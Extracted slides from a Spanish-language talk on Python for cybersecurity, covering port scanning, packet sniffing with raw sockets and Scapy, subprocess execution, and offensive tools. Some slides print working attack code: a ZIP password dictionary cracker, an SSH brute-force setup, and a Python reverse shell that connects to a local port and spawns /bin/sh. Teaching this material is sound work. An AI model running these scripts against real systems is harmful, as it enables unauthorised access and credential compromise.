www.sti-innsbruck.at

About me 2 http://jmortega.github.io/

Books 3

Formación 4 https://www.adrformacion.com/cursos/pythonseg/pythonseg.html

Agenda • Introducción a Python para proyectos de ciberseguridad • Herramientas de pentesting • Herramientas Python desde el punto de vista defensivo • Herramientas Python desde el punto de vista ofensivo 5

Python para proyectos de ciberseguridad 6 1. Diseñado para la creación rápida de prototipos 2. Estructura simple y limpia, mejora la legibilidad y facilidad de uso. 3. Amplia biblioteca, también facilidad de interconexión 4. Ampliamente adoptado, la mayoría de las distribuciones de Linux lo instalan por defecto.

Python para proyectos de ciberseguridad 7

Herramientas de pentesting 8 import re input_ip = input('Enter the ip:') flag = 0 pattern = "^\d{1,3}.\d{1,3}.\d{1,3}.\d{1,3}$" match = re.match(pattern, input_ip) if (match): field = input_ip.split(".") for i in range(0, len(field)): if (int(field[i]) < 256): flag += 1 else: flag = 0 if (flag == 4): print("valid ip") else: print('No match for ip or not a valid ip') https://docs.python.org/3/library/re.html

Herramientas de pentesting 9

Herramientas de pentesting 10 import nmap nma = nmap.PortScannerAsync() def callback_function(host, scan_result): print('RESULTADO ==>') print(host, scan_result) nma.scan(hosts='127.0.0.1', arguments='-sC -Pn', callback=callback_function) while nma.still_scanning(): print("Esperando a que termine el escaneo ...") nma.wait(2) https://pypi.org/project/python-nmap/

Basic Networking 11

Port Scanning 12

Port Scanning 13 import socket from concurrent import futures def check_port(targetIp, portNumber, timeout): TCPsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) TCPsock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) TCPsock.settimeout(timeout) try: TCPsock.connect((targetIp, portNumber)) return (portNumber) except: return def port_scanner(targetIp, timeout): threadPoolSize = 500 portsToCheck = 10000 executor = futures.ThreadPoolExecutor(max_workers=threadPoolSize) checks = [ executor.submit(check_port, targetIp, port, timeout) for port in range(0, portsToCheck, 1) ] for response in futures.as_completed(checks): if (response.result()): print('Listening on port: {}'.format(response.result()))

Port Scanning 14

Banner Grabing 15

Scraping 16 ● Requests ○ https://docs.python-requests.org/en/master ○ Peticiones HTTP ● BeautifulSoup ○ https://www.crummy.com/software/BeautifulSou p/bs4/doc ○ Parser XML,HTML ● Scrapy ○ https://scrapy.org ○ Framework de scraping

Scrapy 17

Extracción de subdominios 18 ● https://github.com/1N3/BlackWidow

Reconspider 19 ● https://github.com/bhavsec/reconspider

Reconspider 20

SpiderFoot 21

RED TEAM vs BLUE TEAM 22

SQLMap 23 ● https://sqlmap.org

SQLMap 24

PwnXSS 25

Fuzzing 26 ● Wfuzz ○ https://github.com/xmendez/wfuzz/ ○ Web fuzzer framework ● Pyfuzz ○ https://github.com/AyoobAli/pyfuzz ○ Fuzzing para descubrir archivos / directorios ocultos

Fuxi Scanner 27 ● https://github.com/jeffzh3ng/fuxi

Fuxi Scanner 28

Sniffing de paquetes 29 import socket import struct def ethernet_frame(data): dest_mac, src_mac, proto = struct.unpack('! 6s 6s H', data[:14]) return format_mac_addr(dest_mac), format_mac_addr(src_mac), socket.htons(proto), data[14:] def format_mac_addr(bytes_addr): bytes_str = map('{:02x}'.format, bytes_addr) return ':'.join(bytes_str).upper() def main(): conn = socket.socket(socket.AF_PACKET, socket.SOCK_RAW, socket.ntohs(3)) while True: raw_data, addr = conn.recvfrom(65535) dest_mac, src_mac, eth_proto, data = ethernet_frame(raw_data) if eth_proto == 8: print('\nEthernet Frame:') print('Destination: {}, Source: {}, Protocol: {}'.format(dest_mac, src_mac, eth_proto)) print(data) if __name__ == "__main__": main()

Manipulación de paquetes 30 ● Scapy ○ https://scapy.net ○ Manipulación y decodificación de paquetes. ○ Enviar, rastrear, diseccionar y falsificar paquetes de red.

Manipulación de paquetes 31 from scapy.all import * packetCount = 0 def customAction(packet): global packetCount packetCount += 1 return "{}) {} → {}".format(packetCount, packet[0][1].src, packet[0][1].dst) ## Setup sniff, filtering for IP traffic sniff(filter="ip",prn=customAction)

Manipulación de paquetes 32 from scapy.all import ICMP from scapy.all import IP from scapy.all import sr1 from scapy.all import ls if __name__ == "__main__": dest_ip = "www.google.com" ip_layer = IP(dst = dest_ip) print(ls(ip_layer)) # displaying complete layer info # accessing the fields print("Destination = ", ip_layer.dst) print("Summary = ",ip_layer.summary())

Sniffing de paquetes 33 from scapy.all import * def main(): sniff(prn=http_header, filter="tcp port 80") def http_header(packet): http_packet=str(packet) if http_packet.find('GET'): return print_packet(packet) def print_packet(packet1): ret = "-------------------------------[ Received Packet ] -------------------------------\n" ret += "\n".join(packet1.sprintf("{Raw:%Raw.load%}\n").split(r"\r\n")) ret += "---------------------------------------------------------------------------------\n" return ret if __name__ == '__main__': main()

Explotación 34 ● CrackMapExec ○ https://github.com/byt3bl33d3r/CrackMapExec ○ Mapeo de la red, obtiene credenciales y ejecuta comandos. ● DeathStar ○ https://github.com/byt3bl33d3r/DeathStar ■ Permite automatizar la escalada de privilegios en un entorno Active Directory.

Password cracking 35 import zipfile import time encrypted_filename= "secret_file.zip" zFile = zipfile.ZipFile(encrypted_filename, "r") passFile = open("passwords.txt", "r") for line in passFile.readlines(): test_password = line.strip("\n").encode('utf-8') try: print(test_password) zFile.extractall(pwd=test_password) print("Match found") break except Exception as err: pass

SSH brute force 36 import paramiko ssh = paramiko.SSHClient() ssh.load_system_host_keys() ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) ssh.connect(‘127.0.0.1', username=‘user', password=‘password') stdin,stdout,stderr = ssh.exec_command("uname -a")

SSH brute force 37

Ejecución de procesos 38 https://docs.python.org/3/library/subprocess.html import subprocess subprocess.run('ls -la', shell=True) subprocess.run(['ls', '-la'])

Ejecución de procesos 39 https://docs.python.org/3/library/subprocess.html import subprocess process = subprocess.run(['which', 'python3'], capture_output=True) if process.returncode != 0: raise OSError('Sorry python3 is not installed') python_bin = process.stdout.strip() print(f'Python found in: {python_bin}') CompletedProcess(args=['which', 'python3'], returncode=0, stdout=b'/usr/bin/python3\n', stderr=b'')

Ejecución de procesos 40 https://docs.python.org/3/library/subprocess.html from pathlib import Path import subprocess source = Path("/home/linux") cmd = ["ls", "-l", source] proc = subprocess.Popen(cmd, stdout=subprocess.PIPE) stdout, stderr = proc.communicate() print(stdout.decode("utf-8").split('\n')[:-1])

Shell inversa 41

Shell inversa 42 #!/usr/bin/python import socket import subprocess import os sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.connect(("127.0.0.1", 45679)) os.dup2(sock.fileno(),0) os.dup2(sock.fileno(),1) os.dup2(sock.fileno(),2) shell_remote = subprocess.call(["/bin/sh", "-i"]) #proc = subprocess.call(["/bin/ls", "-i"])

Books 43

Books 44 https://github.com/PacktPublis hing/Python-Ethical-Hacking https://github.com/PacktPub lishing/Python-for-Offensive -PenTest

GitHub repository 45 https://github.com/jmortega/python_ciberseguridad_2021

46